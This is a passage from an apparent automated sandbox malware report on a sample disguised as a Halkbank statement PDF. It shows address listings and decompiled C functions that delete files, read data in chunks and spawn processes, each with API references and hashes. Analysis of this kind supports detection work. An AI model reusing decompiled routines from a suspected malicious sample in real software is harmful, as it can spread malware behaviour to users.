                                                      0x00406e82
                                                      0x00406e85
                                                      0x00406e88
                                                      0x00406e8f
                                                      0x00406e93
                                                      0x00406e95
                                                      0x00406e99
                                                      0x00406e65
                                                      0x00406e65
                                                      0x00406e69
                                                      0x00406e71
                                                      0x00406e76
                                                      0x00406e78
                                                      0x00406e7a
                                                      0x00406e7a
                                                      0x00406e9c
                                                      0x00406ea3
                                                      0x00406ea6
                                                      0x00000000
                                                      0x00406eac
                                                      0x00000000
                                                      0x00406eac
                                                      0x00000000
                                                      0x00406eb1
                                                      0x00406eb1
                                                      0x00406eb5
                                                      0x00407575
                                                      0x00000000
                                                      0x00407575
                                                      0x00406ebb
                                                      0x00406ebe
                                                      0x00406ec1
                                                      0x00406ec5
                                                      0x00406ec8
                                                      0x00406ece
                                                      0x00406ed0
                                                      0x00406ed0
                                                      0x00406ed0
                                                      0x00406ed3
                                                      0x00406ed6
                                                      0x00406ed6
                                                      0x00406ed6
                                                      0x00406edc
                                                      0x00000000
                                                      0x00000000
                                                      0x00406ede
                                                      0x00406ee1
                                                      0x00406ee4
                                                      0x00406ee7
                                                      0x00406eea
                                                      0x00406eed
                                                      0x00406ef0
                                                      0x00406ef3
                                                      0x00406ef6
                                                      0x00406ef9
                                                      0x00406efc
                                                      0x00406f14
                                                      0x00406f17
                                                      0x00406f1a
                                                      0x00406f1d
                                                      0x00406f1d
                                                      0x00406f20
                                                      0x00406f24
                                                      0x00406f26
                                                      0x00406efe
                                                      0x00406efe
                                                      0x00406f06
                                                      0x00406f0b
                                                      0x00406f0d
                                                      0x00406f0f
                                                      0x00406f0f
                                                      0x00406f29
                                                      0x00406f30
                                                      0x00406f33
                                                      0x00000000
                                                      0x00406f35
                                                      0x00000000
                                                      0x00406f35
                                                      0x00406f33
                                                      0x00406f3a
                                                      0x00406f3a
                                                      0x00406f3a
                                                      0x00406f3a
                                                      0x00000000
                                                      0x00000000
                                                      0x00406f75
                                                      0x00406f75
                                                      0x00406f79
                                                      0x00407581
                                                      0x00000000
                                                      0x00407581
                                                      0x00406f7f
                                                      0x00406f82
                                                      0x00406f85
                                                      0x00406f89
                                                      0x00406f8c
                                                      0x00406f92
                                                      0x00406f94
                                                      0x00406f94
                                                      0x00406f94
                                                      0x00406f97
                                                      0x00406f9a
                                                      0x00406f9a
                                                      0x00406fa0
                                                      0x00406f3e
                                                      0x00406f3e
                                                      0x00406f41
                                                      0x00000000
                                                      0x00406f41
                                                      0x00406fa2
                                                      0x00406fa2
                                                      0x00406fa5
                                                      0x00406fa8
                                                      0x00406fab
                                                      0x00406fae
                                                      0x00406fb1
                                                      0x00406fb4
                                                      0x00406fb7
                                                      0x00406fba
                                                      0x00406fbd
                                                      0x00406fc0
                                                      0x00406fd8
                                                      0x00406fdb
                                                      0x00406fde
                                                      0x00406fe1
                                                      0x00406fe1
                                                      0x00406fe4
                                                      0x00406fe8
                                                      0x00406fea
                                                      0x00406fc2
                                                      0x00406fc2
                                                      0x00406fca
                                                      0x00406fcf
                                                      0x00406fd1
                                                      0x00406fd3
                                                      0x00406fd3
                                                      0x00406fed
                                                      0x00406ff4
                                                      0x00406ff7
                                                      0x00000000
                                                      0x00406ff9
                                                      0x00000000
                                                      0x00406ff9
                                                      0x00000000
                                                      0x00407286
                                                      0x00407286
                                                      0x0040728a
                                                      0x004075b1
                                                      0x00000000
                                                      0x004075b1
                                                      0x00407290
                                                      0x00407293
                                                      0x00407296
                                                      0x0040729a
                                                      0x0040729d
                                                      0x004072a3
                                                      0x004072a5
                                                      0x004072a5
                                                      0x004072a5
                                                      0x004072a8
                                                      0x00000000
                                                      0x00000000
                                                      0x00407056
                                                      0x00407056
                                                      0x00407059
                                                      0x004073cb
                                                      0x004073cb
                                                      0x00000000
                                                      0x004073cb
                                                      0x00000000
                                                      0x00407395
                                                      0x00407399
                                                      0x004073bb
                                                      0x004073be
                                                      0x004073c8
                                                      0x004073cb
                                                      0x004073cb
                                                      0x00000000
                                                      0x004073cb
                                                      0x004073cb
                                                      0x0040739b
                                                      0x0040739e
                                                      0x004073a2
                                                      0x004073a5
                                                      0x004073a5
                                                      0x004073a8
                                                      0x00000000
                                                      0x00000000
                                                      0x00407452
                                                      0x00407456
                                                      0x00407474
                                                      0x00407474
                                                      0x00407474
                                                      0x0040747b
                                                      0x00407482
                                                      0x00407489
                                                      0x00407489
                                                      0x00000000
                                                      0x00407489
                                                      0x00407458
                                                      0x0040745b
                                                      0x0040745e
                                                      0x00407461
                                                      0x00407468
                                                      0x004073ac
                                                      0x004073ac
                                                      0x004073af
                                                      0x00000000
                                                      0x00000000
                                                      0x00407543
                                                      0x00407546
                                                      0x00407447
                                                      0x00000000
                                                      0x00000000
                                                      0x0040717d
                                                      0x0040717f
                                                      0x00407186
                                                      0x00407187
                                                      0x00407189
                                                      0x0040718c
                                                      0x00000000
                                                      0x00000000
                                                      0x00407194
                                                      0x00407197
                                                      0x0040719a
                                                      0x0040719c
                                                      0x0040719e
                                                      0x0040719e
                                                      0x0040719f
                                                      0x004071a2
                                                      0x004071a9
                                                      0x004071ac
                                                      0x004071ba
                                                      0x00000000
                                                      0x00000000
                                                      0x00407490
                                                      0x00407490
                                                      0x00407493
                                                      0x0040749a
                                                      0x00000000
                                                      0x00000000
                                                      0x0040749f
                                                      0x0040749f
                                                      0x004074a3
                                                      0x004075db
                                                      0x00000000
                                                      0x004075db
                                                      0x004074a9
                                                      0x004074ac
                                                      0x004074af
                                                      0x004074b3
                                                      0x004074b6
                                                      0x004074bc
                                                      0x004074be
                                                      0x004074be
                                                      0x004074be
                                                      0x004074c1
                                                      0x004074c4
                                                      0x004074c4
                                                      0x004074c4
                                                      0x004074c4
                                                      0x004074c7
                                                      0x004074c7
                                                      0x004074cb
                                                      0x0040752b
                                                      0x0040752e
                                                      0x00407533
                                                      0x00407534
                                                      0x00407536
                                                      0x00407538
                                                      0x0040753b
                                                      0x00407447
                                                      0x00407447
                                                      0x00000000
                                                      0x0040744d
                                                      0x00407447
                                                      0x004074cd
                                                      0x004074d3
                                                      0x004074d6
                                                      0x004074d9
                                                      0x004074dc
                                                      0x004074df
                                                      0x004074e2
                                                      0x004074e5
                                                      0x004074e8
                                                      0x004074eb
                                                      0x004074ee
                                                      0x00407507
                                                      0x0040750a
                                                      0x0040750d
                                                      0x00407510
                                                      0x00407514
                                                      0x00407516
                                                      0x00407516
                                                      0x00407517
                                                      0x0040751a
                                                      0x004074f0
                                                      0x004074f0
                                                      0x004074f8
                                                      0x004074fd
                                                      0x004074ff
                                                      0x00407502
                                                      0x00407502
                                                      0x0040751d
                                                      0x00407524
                                                      0x00000000
                                                      0x00407526
                                                      0x00000000
                                                      0x00407526
                                                      0x00000000
                                                      0x004071c2
                                                      0x004071c5
                                                      0x004071fb
                                                      0x0040732b
                                                      0x0040732b
                                                      0x0040732b
                                                      0x0040732b
                                                      0x0040732e
                                                      0x0040732e
                                                      0x00407331
                                                      0x00407333
                                                      0x004075bd
                                                      0x00000000
                                                      0x004075bd
                                                      0x00407339
                                                      0x0040733c
                                                      0x00000000
                                                      0x00000000
                                                      0x00407342
                                                      0x00407346
                                                      0x00407349
                                                      0x00407349
                                                      0x00407349
                                                      0x00000000
                                                      0x00407349
                                                      0x004071c7
                                                      0x004071c9
                                                      0x004071cb
                                                      0x004071cd
                                                      0x004071d0
                                                      0x004071d1
                                                      0x004071d3
                                                      0x004071d5
                                                      0x004071d8
                                                      0x004071db
                                                      0x004071f1
                                                      0x004071f6
                                                      0x0040722e
                                                      0x0040722e
                                                      0x00407232
                                                      0x0040725e
                                                      0x00407260
                                                      0x00407267
                                                      0x0040726a
                                                      0x0040726d
                                                      0x0040726d
                                                      0x00407272
                                                      0x00407272
                                                      0x00407274
                                                      0x00407277
                                                      0x0040727e
                                                      0x00407281
                                                      0x004072ae
                                                      0x004072ae
                                                      0x004072b1
                                                      0x004072b4
                                                      0x00407328
                                                      0x00407328
                                                      0x00407328
                                                      0x00000000
                                                      0x00407328
                                                      0x004072b6
                                                      0x004072bc
                                                      0x004072bf
                                                      0x004072c2
                                                      0x004072c5
                                                      0x004072c8
                                                      0x004072cb
                                                      0x004072ce
                                                      0x004072d1
                                                      0x004072d4
                                                      0x004072d7
                                                      0x004072f0
                                                      0x004072f2
                                                      0x004072f5
                                                      0x004072f6
                                                      0x004072f9
                                                      0x004072fb
                                                      0x004072fe
                                                      0x00407300
                                                      0x00407302
                                                      0x00407305
                                                      0x00407307
                                                      0x0040730a
                                                      0x0040730e
                                                      0x00407310
                                                      0x00407310
                                                      0x00407311
                                                      0x00407314
                                                      0x00407317
                                                      0x004072d9
                                                      0x004072d9
                                                      0x004072e1
                                                      0x004072e6
                                                      0x004072e8
                                                      0x004072eb
                                                      0x004072eb
                                                      0x0040731a
                                                      0x00407321
                                                      0x004072ab
                                                      0x004072ab
                                                      0x004072ab
                                                      0x004072ab
                                                      0x00000000
                                                      0x00407323
                                                      0x00000000
                                                      0x00407323
                                                      0x00407321
                                                      0x00407234
                                                      0x00407237
                                                      0x00407239
                                                      0x0040723c
                                                      0x0040723f
                                                      0x00407242
                                                      0x00407244
                                                      0x00407247
                                                      0x0040724a
                                                      0x0040724a
                                                      0x0040724d
                                                      0x0040724d
                                                      0x00407250
                                                      0x00407257
                                                      0x0040722b
                                                      0x0040722b
                                                      0x0040722b
                                                      0x0040722b
                                                      0x00000000
                                                      0x00407259
                                                      0x00000000
                                                      0x00407259
                                                      0x00407257
                                                      0x004071dd
                                                      0x004071e0
                                                      0x004071e2
                                                      0x004071e5
                                                      0x00000000
                                                      0x00000000
                                                      0x00406f44
                                                      0x00406f44
                                                      0x00406f48
                                                      0x0040758d
                                                      0x00000000
                                                      0x0040758d
                                                      0x00406f4e
                                                      0x00406f51
                                                      0x00406f54
                                                      0x00406f57
                                                      0x00406f5a
                                                      0x00406f5d
                                                      0x00406f60
                                                      0x00406f62
                                                      0x00406f65
                                                      0x00406f68
                                                      0x00406f6b
                                                      0x00406f6d
                                                      0x00406f6d
                                                      0x00406f6d
                                                      0x00000000
                                                      0x00000000
                                                      0x004070cf
                                                      0x004070cf
                                                      0x004070d3
                                                      0x00407599
                                                      0x00000000
                                                      0x00407599
                                                      0x004070d9
                                                      0x004070dc
                                                      0x004070df
                                                      0x004070e2
                                                      0x004070e4
                                                      0x004070e4
                                                      0x004070e4
                                                      0x004070e7
                                                      0x004070ea
                                                      0x004070ed
                                                      0x004070f0
                                                      0x004070f3
                                                      0x004070f6
                                                      0x004070f7
                                                      0x004070f9
                                                      0x004070f9
                                                      0x004070f9
                                                      0x004070fc
                                                      0x004070ff
                                                      0x00407102
                                                      0x00407105
                                                      0x00407105
                                                      0x00407105
                                                      0x00407108
                                                      0x0040710a
                                                      0x0040710a
                                                      0x00000000
                                                      0x00000000
                                                      0x0040734c
                                                      0x0040734c
                                                      0x0040734c
                                                      0x00407350
                                                      0x00000000
                                                      0x00000000
                                                      0x00407356
                                                      0x00407359
                                                      0x0040735c
                                                      0x0040735f
                                                      0x00407361
                                                      0x00407361
                                                      0x00407361
                                                      0x00407364
                                                      0x00407367
                                                      0x0040736a
                                                      0x0040736d
                                                      0x00407370
                                                      0x00407373
                                                      0x00407374
                                                      0x00407376
                                                      0x00407376
                                                      0x00407376
                                                      0x00407379
                                                      0x0040737c
                                                      0x0040737f
                                                      0x00407382
                                                      0x00407385
                                                      0x00407389
                                                      0x0040738b
                                                      0x0040738e
                                                      0x00000000
                                                      0x00407390
                                                      0x0040710d
                                                      0x0040710d
                                                      0x00000000
                                                      0x0040710d
                                                      0x0040738e
                                                      0x004075c3
                                                      0x00000000
                                                      0x00000000
                                                      0x00406bf2
                                                      0x004075fa
                                                      0x004075fa
                                                      0x00000000
                                                      0x004075fa
                                                      0x00407447
                                                      0x004073ce
                                                      0x004073cb

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                      • Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
                                                      • Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                      • Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405D2C Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 41%
                                                      			E00405D2C(void* __eflags, WCHAR* _a4, signed int _a8) {
				int _t9;
				long _t13;
				WCHAR* _t14;

				_t14 = _a4;
				_t13 = E00406133(_t14);
				if(_t13 == 0xffffffff) {
					L8:
					return 0;
				}
				_push(_t14);
				if((_a8 & 0x00000001) == 0) {
					_t9 = DeleteFileW();
				} else {
					_t9 = RemoveDirectoryW(); // executed
				}
				if(_t9 == 0) {
					if((_a8 & 0x00000004) == 0) {
						SetFileAttributesW(_t14, _t13);
					}
					goto L8;
				} else {
					return 1;
				}
			}






                                                      0x00405d2d
                                                      0x00405d38
                                                      0x00405d3d
                                                      0x00405d6d
                                                      0x00000000
                                                      0x00405d6d
                                                      0x00405d44
                                                      0x00405d45
                                                      0x00405d4f
                                                      0x00405d47
                                                      0x00405d47
                                                      0x00405d47
                                                      0x00405d57
                                                      0x00405d63
                                                      0x00405d67
                                                      0x00405d67
                                                      0x00000000
                                                      0x00405d59
                                                      0x00000000
                                                      0x00405d5b

                                                      APIs
                                                        • Part of subcall function 00406133: GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                        • Part of subcall function 00406133: SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                                                      • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F0E), ref: 00405D47
                                                      • DeleteFileW.KERNEL32(?,?,?,00000000,00405F0E), ref: 00405D4F
                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D67
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: File$Attributes$DeleteDirectoryRemove
                                                      • String ID:
                                                      • API String ID: 1655745494-0
                                                      • Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                                      • Instruction ID: f7500ddcb6900c42920b0fa7cdf939b3a50fd8fb6693fff67202f671924a8b23
                                                      • Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                                      • Instruction Fuzzy Hash: 6DE0E531218A9156C3207734AD0CB5B2A98EF86314F09893FF5A2B11E0D77885078AAD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406AE0 Relevance: 4.5, APIs: 3, Instructions: 27synchronizationCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00406AE0(void* __ecx, void* _a4) {
				long _v8;
				long _t6;

				_t6 = WaitForSingleObject(_a4, 0x64);
				while(_t6 == 0x102) {
					E00406A71(0xf);
					_t6 = WaitForSingleObject(_a4, 0x64);
				}
				GetExitCodeProcess(_a4,  &_v8); // executed
				return _v8;
			}





                                                      0x00406af1
                                                      0x00406b08
                                                      0x00406afc
                                                      0x00406b06
                                                      0x00406b06
                                                      0x00406b13
                                                      0x00406b1f

                                                      APIs
                                                      • WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                                      • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00406B06
                                                      • GetExitCodeProcess.KERNELBASE ref: 00406B13
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: ObjectSingleWait$CodeExitProcess
                                                      • String ID:
                                                      • API String ID: 2567322000-0
                                                      • Opcode ID: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                                                      • Instruction ID: dffe0f0baa3edeb4a8159ab808a8d66eaa88359a938bc324e0f181ad12cbd91f
                                                      • Opcode Fuzzy Hash: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                                                      • Instruction Fuzzy Hash: 36E09236600118FBDB00AB54DD05E9E7B6ADB45704F114036FA05B6190C6B1AE22DA94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00403371 Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 92%
                                                      			E00403371(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t29;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x42a2b8;
					 *0x420ef4 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E00403479(4);
				if(_t22 >= 0) {
					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x420ef4 =  *0x420ef4 + 4;
						_t36 = E00403479(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x420ef4 =  *0x420ef4 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										_t29 = E004061DB( *0x40a01c, 0x414ef0, _t28); // executed
										if(_t29 == 0) {
											goto L18;
										}
										_t30 = E0040620A(_a8, 0x414ef0, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x420ef4 =  *0x420ef4 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}















                                                      0x00403375
                                                      0x0040337e
                                                      0x00403387
                                                      0x0040338b
                                                      0x00403396
                                                      0x00403396
                                                      0x0040339e
                                                      0x004033a5
                                                      0x004033b7
                                                      0x004033be
                                                      0x00403463
                                                      0x00403463
                                                      0x00000000
                                                      0x004033c4
                                                      0x004033c7
                                                      0x004033d3
                                                      0x004033d7
                                                      0x00403471
                                                      0x00403471
                                                      0x004033dd
                                                      0x004033e0
                                                      0x0040343f
                                                      0x00403445
                                                      0x00403447
                                                      0x00403447
                                                      0x00403459
                                                      0x00403461
                                                      0x00403468
                                                      0x0040346b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004033e2
                                                      0x004033e5
                                                      0x00000000
                                                      0x004033eb
                                                      0x004033f0
                                                      0x004033f7
                                                      0x004033fa
                                                      0x004033fc
                                                      0x004033fc
                                                      0x00403409
                                                      0x0040340c
                                                      0x00403413
                                                      0x00000000
                                                      0x00000000
                                                      0x0040341c
                                                      0x00403423
                                                      0x0040343b
                                                      0x00403465
                                                      0x00403465
                                                      0x00403425
                                                      0x00403425
                                                      0x00403428
                                                      0x0040342b
                                                      0x00403431
                                                      0x00403437
                                                      0x00000000
                                                      0x00403439
                                                      0x00000000
                                                      0x00403439
                                                      0x00403437
                                                      0x00000000
                                                      0x00403423
                                                      0x00000000
                                                      0x004033f0
                                                      0x004033e5
                                                      0x004033e0
                                                      0x004033d7
                                                      0x004033be
                                                      0x00403473
                                                      0x00403476

                                                      APIs
                                                      • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: FilePointer
                                                      • String ID:
                                                      • API String ID: 973152223-0
                                                      • Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                      • Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
                                                      • Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                      • Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 69%
                                                      			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a290;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42924c =  *0x42924c + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0);
					}
				}
				return 0;
			}











                                                      0x0040138a
                                                      0x004013fa
                                                      0x0040139b
                                                      0x004013a0
                                                      0x00000000
                                                      0x00000000
                                                      0x004013a2
                                                      0x004013a3
                                                      0x004013ad
                                                      0x00000000
                                                      0x00401404
                                                      0x004013b0
                                                      0x004013b7
                                                      0x004013bd
                                                      0x004013be
                                                      0x004013c0
                                                      0x004013c2
                                                      0x004013b9
                                                      0x004013b9
                                                      0x004013ba
                                                      0x004013ba
                                                      0x004013c9
                                                      0x004013cb
                                                      0x004013f4
                                                      0x004013f4
                                                      0x004013c9
                                                      0x00000000

                                                      APIs
                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                      • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                      • Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
                                                      • Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                      • Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405C4B Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00405C4B(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x426750->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426750,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                      0x00405c54
                                                      0x00405c74
                                                      0x00405c7c
                                                      0x00405c81
                                                      0x00000000
                                                      0x00405c87
                                                      0x00405c8b

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
